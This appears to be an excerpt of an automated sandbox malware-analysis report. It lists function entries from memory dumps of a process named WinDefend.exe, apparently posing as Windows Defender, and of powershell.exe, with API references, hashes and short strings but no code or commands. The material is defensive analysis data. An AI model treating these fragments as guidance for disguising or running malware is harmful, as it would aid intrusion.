DispatchMessageW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,-00000018,?), ref: 05DDE193

Memory Dump Source

Source File: 00000016.00000002.3455748350.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5dd0000_WinDefend.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: a4c434549107a9ed36067ba510376f19f650b1a7a048a70e76e3196aab24ad12
Instruction ID: 523dd02282b4160f4336aacd4c36a3e8385d240547babfac0de4ff6392bbae26
Opcode Fuzzy Hash: a4c434549107a9ed36067ba510376f19f650b1a7a048a70e76e3196aab24ad12
Instruction Fuzzy Hash: 0A319DB9D012099FCB10CFAAD984ADEFBF5EB49320F14901AE918B7310D335A941CFA5

Function 062C10CB Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.3462770615.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_62c0000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fead53f953dc4004d78fbb3d2e91084502c6f0e86ae9bf289b094d1cab9054bd
Instruction ID: 53b57084419254b401123dc7287a8a5a3b05d498300e3ef2659471e152595744
Opcode Fuzzy Hash: fead53f953dc4004d78fbb3d2e91084502c6f0e86ae9bf289b094d1cab9054bd
Instruction Fuzzy Hash: 07B11674D11228CFDBA4CF64D980ADEBBB2FB4A310F1091AAE819B7250DB715E80CF50

Function 062C1009 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.3462770615.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_62c0000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d8a7dc28873b015f2969e57af5b3f23a2e75b382ea43bf26ef9c29ca29d7ca5
Instruction ID: e5502f0a362276054a83d2743b3379e34f6030b13b2ad83902f3f551fa7e2328
Opcode Fuzzy Hash: 3d8a7dc28873b015f2969e57af5b3f23a2e75b382ea43bf26ef9c29ca29d7ca5
Instruction Fuzzy Hash: 09B10674E11229CFDBA4CF64D980ADDBBB2FB4A310F1091AAE819B7254DB715E80CF50

Function 062C1939 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.3462770615.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_62c0000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3483f796f2a3134c7d1c37854b6da55e40434746f9c7f581cc99fc0f1c46dea8
Instruction ID: 5d108014c1ea85f8acecdc481aa6126266f56d47d36ed355e17acd97bbac6ceb
Opcode Fuzzy Hash: 3483f796f2a3134c7d1c37854b6da55e40434746f9c7f581cc99fc0f1c46dea8
Instruction Fuzzy Hash: C3312974E11218CFCB44DFA4D5895DDFBB2EB89310F20A12AD80AB7214D7305921CF50

Function 0144D1FC Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.3279156525.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_144d000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c39c6261ee40d0c0b95c08e60f11aa351be3b94e60d6030a17dff29f9eab21d
Instruction ID: f15ba49f257d9f328a3a61b641101a838dc3c9dbb9744242ad3764f2262d92be
Opcode Fuzzy Hash: 0c39c6261ee40d0c0b95c08e60f11aa351be3b94e60d6030a17dff29f9eab21d
Instruction Fuzzy Hash: 7A21D671904244DFEB06DF98D9C4B27BF65FB98320F24C56AE9090B366C33AD416CBA1

Function 0144D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.3279156525.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_144d000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73058f30ef345f8abaafc02ed5eddfb7a3b81a2b30e8b6f5a7daf73caa7e8c36
Instruction ID: c3bcc6f43c4c9b40b2c72c14c92969c4623e239079038ccf4118a4ece657528d
Opcode Fuzzy Hash: 73058f30ef345f8abaafc02ed5eddfb7a3b81a2b30e8b6f5a7daf73caa7e8c36
Instruction Fuzzy Hash: 5B210671900204DFEB05DF58D9C0B57BF65FBA8324F20C57AE9090B366C33AE456CAA1

Function 0145D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.3280079229.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_145d000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fb7619b43675d83cfd6c9d831dfa4bdfd42bdc188e69e134d256e4a89db96e1
Instruction ID: a64e6bf21e9333295d4b57ef086c70aa4a519d7088a795dd890f65e1f95aba2c
Opcode Fuzzy Hash: 3fb7619b43675d83cfd6c9d831dfa4bdfd42bdc188e69e134d256e4a89db96e1
Instruction Fuzzy Hash: BA2103B1904200DFDB55DF68D980B16BF65EF84718F20C56ADD0A4B367C33AD407CA61

Function 0145D005 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.3280079229.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_145d000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a81479ca1f82036856086df258c91be99615de3ee126dba60b63777e9692c52
Instruction ID: 88d870af2fbc2758f394d599dfc7f368f7ec007c721539b39f1896970a4587e3
Opcode Fuzzy Hash: 8a81479ca1f82036856086df258c91be99615de3ee126dba60b63777e9692c52
Instruction Fuzzy Hash: 272183755083809FDB03CF64D994716BF71EF46214F28C5DAD8498F2A7C33A9806CB62

Function 0144D1F7 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.3279156525.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_144d000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d06fae078f3ccc2112caf8552f6b645ede566e603d6c7b0d9faf10800b04cc1c
Instruction ID: f4eb6c3b9c8c903a3a93692df706c5324e64a5ab59f2d23fedd08221ea733c02
Opcode Fuzzy Hash: d06fae078f3ccc2112caf8552f6b645ede566e603d6c7b0d9faf10800b04cc1c
Instruction Fuzzy Hash: 1B21A276904240DFDB06CF54D9C4B16BF71FB94324F24C5AADD450B666C336D416CBA1

Function 0144D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.3279156525.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_144d000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: a13ad8ea7c7c3bc32eea9a498674c44b7ffd1f2d899ea054d27128825123461f
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: 8311CD76804240CFDB02CF54D9C4B56BF61FB94224F24C6AAD9090A266C33AE45ACBA2

Function 0144D889 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.3279156525.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_144d000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35f741a49e0b8426a8d07b63e540ce0124b666031ddc98f205b4e6ed297b032d
Instruction ID: 7585298264156f9eae4a2b98a7bcfc54c259d981f5c7da79ef8073b476c01a86
Opcode Fuzzy Hash: 35f741a49e0b8426a8d07b63e540ce0124b666031ddc98f205b4e6ed297b032d
Instruction Fuzzy Hash: 8601F7319043449BF7219A9ECD84B77BF98EF66320F18C42BED1D4B2A6C2399840CA71

Function 0144D888 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.3279156525.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_144d000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c56b80d251d910059397a0b5618f4dc7c3011cfec3dd58a620ba072b87fd4af1
Instruction ID: bb2fcc019011b439e22099826dd5a6510370d4919d167bbef42595f8a6b21609
Opcode Fuzzy Hash: c56b80d251d910059397a0b5618f4dc7c3011cfec3dd58a620ba072b87fd4af1
Instruction Fuzzy Hash: 1BF0CD71804344AAF7218A0ADC84B63FFA8EF56624F18C45BEE4C4F296C3799840CAB1

Function 062C06F0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.3462770615.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_62c0000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fff8b26f3c0a26f27bb4dd2951b12e7b08119e53553b40cd8e55addc5082a778
Instruction ID: 01f76b16dfef6c65d6bb5cb8cfeb39dfd4d58657ee4a40f35383afca6ff20d52
Opcode Fuzzy Hash: fff8b26f3c0a26f27bb4dd2951b12e7b08119e53553b40cd8e55addc5082a778
Instruction Fuzzy Hash: 78E092323513419FCB664A95E9009EA77E6AFC5330714816AE94AC7520D66A5803CB40

Function 062C1AB0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.3462770615.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_62c0000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef891bebd8d3a69237b7120540051ac94dceac8867d5caca19adb4425c5c951f
Instruction ID: f7ef5352e07707a213b8086052a3b6ebbed7806ffc3d2c1c2d62e1635631f7be
Opcode Fuzzy Hash: ef891bebd8d3a69237b7120540051ac94dceac8867d5caca19adb4425c5c951f
Instruction Fuzzy Hash: 27E0DF30C5430CAFCB40EFA8E8057CDBBB4AB48310F1082A8D80893305DB345951CB92

Function 062C0BC0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.3462770615.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_62c0000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b5d5c4ee0d91cfa88b86899f5e1db13e70e709cb74ad43057a00facab1f6ee4
Instruction ID: e107154a9e0e66a4ee7b11a8147bab31bec8b4c1271d935a7c89ab41f51170a2
Opcode Fuzzy Hash: 5b5d5c4ee0d91cfa88b86899f5e1db13e70e709cb74ad43057a00facab1f6ee4
Instruction Fuzzy Hash: 34E0C274E10308EFCB95DFA9E005A9DBBB0EB08315F40C5AAD82897250E7369A44CF41

Function 062C0700 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.3462770615.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_62c0000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c0cf57c9877913de109bc9372157a3b29c52438add0a2076fb19f61bf7a6e81
Instruction ID: bc59aa014510229e35ae1a3a2db9fea978cd159fc1243a3e1310f2d85ddd31ad
Opcode Fuzzy Hash: 2c0cf57c9877913de109bc9372157a3b29c52438add0a2076fb19f61bf7a6e81
Instruction Fuzzy Hash: DAD02B3730020197CA250946FC00D6B779FABC8730B04802DFA0DC7610CA52A8019740

Function 062C0BD0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.3462770615.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_62c0000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea24fac7f3d96835390d9f25071aead384e6d5f1014b4508f036f828ac54dc59
Instruction ID: 4e7f81216c6ba0d00eac974eebf078bc75f8531c3c34cdc5b19a72967a781943
Opcode Fuzzy Hash: ea24fac7f3d96835390d9f25071aead384e6d5f1014b4508f036f828ac54dc59
Instruction Fuzzy Hash: 73E0B670D11309EFCB95DFB9D00569CBBB4EB04315F4081AAD81892350E7369A54CF81

Non-executed Functions

Function 0544AE9C Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.3414704739.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5440000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe5dfdcc50a50d8659f60ea1b0c1620da51dccdb85f62c5e85ebba5e7a02e53a
Instruction ID: d7860ac77cc5938faf97648e7eb44a27f857ebab091d7bd1c7e28dcf09fc2960
Opcode Fuzzy Hash: fe5dfdcc50a50d8659f60ea1b0c1620da51dccdb85f62c5e85ebba5e7a02e53a
Instruction Fuzzy Hash: CF31AAB4D052189FDB14CFA9D584AEEFBF1BB49314F20902AE408B7310D375A946CF94

Function 0544D008 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.3414704739.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5440000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd0b6afdcdfad21e696641345f3ccc5bf090642722b19862882f7179c1aea055
Instruction ID: 9b87f874f4f09b52cad60a7438a976cbd743d404d415e8167d8bc71aa22e88f0
Opcode Fuzzy Hash: dd0b6afdcdfad21e696641345f3ccc5bf090642722b19862882f7179c1aea055
Instruction Fuzzy Hash: 8031AAB4D012189FDB14CFA9E984ADEFBF5BB49310F20902AE408B7310D375A946CF94

Analysis Process: powershell.exePID: 8072, Parent PID: 7384COMMON

Execution Graph

Execution Coverage:	2.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 00007FF848F0B9FA Relevance: 3.5, APIs: 1, Instructions: 1993
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE ref: 00007FF848F0C120

Memory Dump Source

Source File: 00000019.00000002.2923830708.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848f00000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: c97b0c90781aadc10baf5f434cf837bd76e29d6cc95964c24302b6baaae8cf61
Instruction ID: 299c37dc7cc0cd13416941881103f11b59476b161f9909a2ec4d99ae687e675e
Opcode Fuzzy Hash: c97b0c90781aadc10baf5f434cf837bd76e29d6cc95964c24302b6baaae8cf61
Instruction Fuzzy Hash: A191067181DBC88FDB56AB2888556A97FF0EF56310F1801EBD48DD7293EB34A845C782

Function 00007FF848FDD638 Relevance: 1.6, Strings: 1, Instructions: 338
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fB_H, xrefs: 00007FF848FDD6DF

Memory Dump Source

Source File: 00000019.00000002.2930892821.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848fd0000_powershell.jbxd

Similarity

API ID:
String ID: fB_H
API String ID: 0-154379860
Opcode ID: ac027bc8180cf2ac5dc4320cd8226b1cdd242b987f286d8693eeee1ab5f9e62f
Instruction ID: 312495eaefe1ed495b988d2327de40808b2de06141fc300d6f9a94c578cd7da4
Opcode Fuzzy Hash: ac027bc8180cf2ac5dc4320cd8226b1cdd242b987f286d8693eeee1ab5f9e62f
Instruction Fuzzy Hash: 93A13331E0EA8A4FE795FB2C58596B97BE1EF553A0F1801FAD10EC71D2DA18AC048785

Function 00007FF849180881 Relevance: .3, Instructions: 344
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000019.00000002.2973781579.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff849180000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdb0a0d1ffbb5356c5de2d5e6b0ad8e138e00ca77cfb4267a68395e4ab4e9907
Instruction ID: bdbf394c98325c71c2d489a4c0a8ae8b0a9cbabd178163371e78b1f791c55da7
Opcode Fuzzy Hash: bdb0a0d1ffbb5356c5de2d5e6b0ad8e138e00ca77cfb4267a68395e4ab4e9907
Instruction Fuzzy Hash: 85A1293190EBC90FE7A7DB2858655B53FE1DF47260B0A01EBD489CB0A3D91D5C0AC762

Function 00007FF848FDDCA8 Relevance: .3, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000019.00000002.2930892821.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848fd0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e16ad750d08caed8676db6be808b1b54e1d81f5f56a1009dc4e40237dc32ccc
Instruction ID: e05050eb80bebc4a0a4427eea932dec6d5fa1c8dc114f05bd57b8d9340768e76
Opcode Fuzzy Hash: 8e16ad750d08caed8676db6be808b1b54e1d81f5f56a1009dc4e40237dc32ccc
Instruction Fuzzy Hash: 8371F232E0DA4D5FEB95FB2CA8446B97BE1FF99391F0402BAD50DC3182EF2898058755

Function 00007FF8491808EA Relevance: .3, Instructions: 254
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000019.00000002.2973781579.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff849180000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9479eb861839c1051ce55c62ed1ae5ef9cf9ffece42f856cbae90012e4cf73b7
Instruction ID: b94920b23241e29bde40a8f75c465ee8f637e902b6e8c0fb03751cbead0b70e4
Opcode Fuzzy Hash: 9479eb861839c1051ce55c62ed1ae5ef9cf9ffece42f856cbae90012e4cf73b7
Instruction Fuzzy Hash: F481E22180EBC94FE7A7DB3858651A53FE1DF47260B0E41EBD488CB0A3D91D9C4AC762

Function 00007FF8491808D3 Relevance: .2, Instructions: 241
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000019.00000002.2973781579.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff849180000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c41187fb7887511783de18bab5f40a04b1e9a595dc2de9c57027ecc4c4dc05ad
Instruction ID: 4b3efb3b52274f6494d21ba0fe294a1433e883fd65b4642c769bba5a37831f9a
Opcode Fuzzy Hash: c41187fb7887511783de18bab5f40a04b1e9a595dc2de9c57027ecc4c4dc05ad
Instruction Fuzzy Hash: AB71152190EBC94FE767DB2858651B57FE1EF47264B0A01FBC488CB0A3D91D9C4AC762

Function 00007FF848FD50A2 Relevance: .2, Instructions: 210
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000019.00000002.2930892821.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848fd0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f870bb2ea0bda2f9ab75360b91e95b8219bd7a1667184307076e4dc56ef7d1d9
Instruction ID: 4e83824c04c4aec7a598a44ebc59cf104f7e5eaf3a07334c22dbc65ec9bfdb89
Opcode Fuzzy Hash: f870bb2ea0bda2f9ab75360b91e95b8219bd7a1667184307076e4dc56ef7d1d9
Instruction Fuzzy Hash: B461263190EAC54FE756AB2858552B97FE0EF4A351F0801FBD14ACB0E3DB18680ACB56

Function 00007FF848FD3C6E Relevance: .2, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000019.00000002.2930892821.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848fd0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e55a0b43e31ac4d6ad8bc8ddf9139e3fe2b1c81f2127d956bc20beb631a8bad7
Instruction ID: bb0219fb63b8649cc6dc9cbe2f83dea0f054e716a27a49034cd671c117e689a1
Opcode Fuzzy Hash: e55a0b43e31ac4d6ad8bc8ddf9139e3fe2b1c81f2127d956bc20beb631a8bad7
Instruction Fuzzy Hash: BD51357040D7C85FD75A9B28A8456A57FF0FF46320F0542AFD089C75A3D768A846CB86

Function 00007FF848FDD702 Relevance: .1, Instructions: 123
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000019.00000002.2930892821.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848fd0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dae0baeed273a22df1dc9012dd65b0a38bcbbe6dfd9c8ca84cf2de9e34cba4d
Instruction ID: eded62e1be9d977226caef666e59163d19dffe539d03bcbbe92dfa4e4dd8326e
Opcode Fuzzy Hash: 4dae0baeed273a22df1dc9012dd65b0a38bcbbe6dfd9c8ca84cf2de9e34cba4d
Instruction Fuzzy Hash: 3C410432D1EA865FF3A6BB2818151786AE0EF16790F1801FAD50ED71C3DE0C6C04875A

Function 00007FF848FD5A64 Relevance: .1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000019.00000002.2930892821.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848fd0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6346edfd35c750120195780efb6d89044cb245efbf1f28a1aa6bbdf3047f2cc
Instruction ID: df78ff1cf2735761c6534fc97d02bff3d7158c4ae6921d14b5cbff491db09509
Opcode Fuzzy Hash: c6346edfd35c750120195780efb6d89044cb245efbf1f28a1aa6bbdf3047f2cc
Instruction Fuzzy Hash: 8B01C421E0E9926FE798B37C28992B86AD0EF59790F0800BED05DC71C3DD0C2C498766

Function 00007FF848FD51B3 Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000019.00000002.2930892821.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848fd0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3edbce0bddbbd0d2249f0a41f38a7855169dec2e773abec63b1dc67e69afedf9
Instruction ID: 779d1f12f062a078943dcd7b5f31daa05891c54c456683bf90229896ed1a1f89
Opcode Fuzzy Hash: 3edbce0bddbbd0d2249f0a41f38a7855169dec2e773abec63b1dc67e69afedf9
Instruction Fuzzy Hash: B0F0AF31E0DA594FEB91EB6898495BDB7F0EF68225B1400BBD10DD7192DA24AC458B82

Analysis Process: WinDefend.exePID: 2132, Parent PID: 1028COMMON

Executed Functions

Function 0EDF0C18 Relevance: 5.5, Strings: 4, Instructions: 541
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

uI[, xrefs: 0EDF1442
4I, xrefs: 0EDF150C
<H, xrefs: 0EDF0E64
4I, xrefs: 0EDF1170

Memory Dump Source

Source File: 0000001F.00000002.3479916007.000000000EDF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0EDF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_edf0000_WinDefend.jbxd

Similarity

API ID:
String ID: 4I$4I$<H$uI[
API String ID: 0-2495848830
Opcode ID: e1f48f5903cccce0f11670e6a07c9fdccd88bfa0b6d7769d2639533b60e94215
Instruction ID: 29de19e82d603f85ad60d32b4ade9b489b16fd30d250e283ac406205c93c328f
Opcode Fuzzy Hash: e1f48f5903cccce0f11670e6a07c9fdccd88bfa0b6d7769d2639533b60e94215
Instruction Fuzzy Hash: FD320674E06219CFDB64CFA5D990B9EBBB2FB89300F1095AAD509B7255DB309E81CF40

Function 0EDF0C08 Relevance: 2.8, Strings: 2, Instructions: 329COMMON

Download Yara Rule

Strings

<H, xrefs: 0EDF0E64
4I, xrefs: 0EDF1170

Memory Dump Source

Source File: 0000001F.00000002.3479916007.000000000EDF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0EDF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_edf0000_WinDefend.jbxd

Similarity

API ID:
String ID: 4I$<H
API String ID: 0-3894381031
Opcode ID: a4daec9aeee4927d541d43f818ccfec8819987bd8ee7688701d5bd5a374bc77b
Instruction ID: 66a0f5b005556618d0d515e9ae98fe09d1d4ef23b3c098c1ad4e4218ae693aa6
Opcode Fuzzy Hash: a4daec9aeee4927d541d43f818ccfec8819987bd8ee7688701d5bd5a374bc77b
Instruction Fuzzy Hash: D7E1E174E02219DFDB68CF65D980B9EBBB2FB89300F1091AAD509B7254DB309E81CF50

Function 0B5AD290 Relevance: 1.9, APIs: 1, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.3464643469.000000000B5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B5A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_b5a0000_WinDefend.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 13087cf7e3845eedb4ea1023034e41e51d3deac966aa5ce5353e883dd3a9f84c
Instruction ID: 54d7e20abc9d0ad3efe3b517e42b10356a47be9a6353fe955a7831a75c44a97d
Opcode Fuzzy Hash: 13087cf7e3845eedb4ea1023034e41e51d3deac966aa5ce5353e883dd3a9f84c
Instruction Fuzzy Hash: B9F15F30A00209CFEB14EFA9C984B9DBBF1FF48704F1585A9E419AF695DBB4E945CB40

Function 0EDF17B8 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.3479916007.000000000EDF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0EDF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_edf0000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6e31e32a6bb71efed1446f2f2729fe9d8c220f3f334f216404e2d7596a0969f
Instruction ID: d6ec3d36bfa79d9a08b6bc4f231a80131b681ffe3a08a135157ec69b541d1c04
Opcode Fuzzy Hash: e6e31e32a6bb71efed1446f2f2729fe9d8c220f3f334f216404e2d7596a0969f
Instruction Fuzzy Hash: 19712874E06218DFDB04CFA6D6446DEBBF2EB89300F24946AD50ABB255DB319D02CF54

Function 0EDF17A8 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.3479916007.000000000EDF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0EDF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_edf0000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7acd474f1613abcb02c31aafff051720064b01ef15d42cf1c68fb53031f944c
Instruction ID: 585e1c88af90583a6982f7c406fbc6c2b476cc8449ed3276f824a1a376421a3c
Opcode Fuzzy Hash: b7acd474f1613abcb02c31aafff051720064b01ef15d42cf1c68fb53031f944c
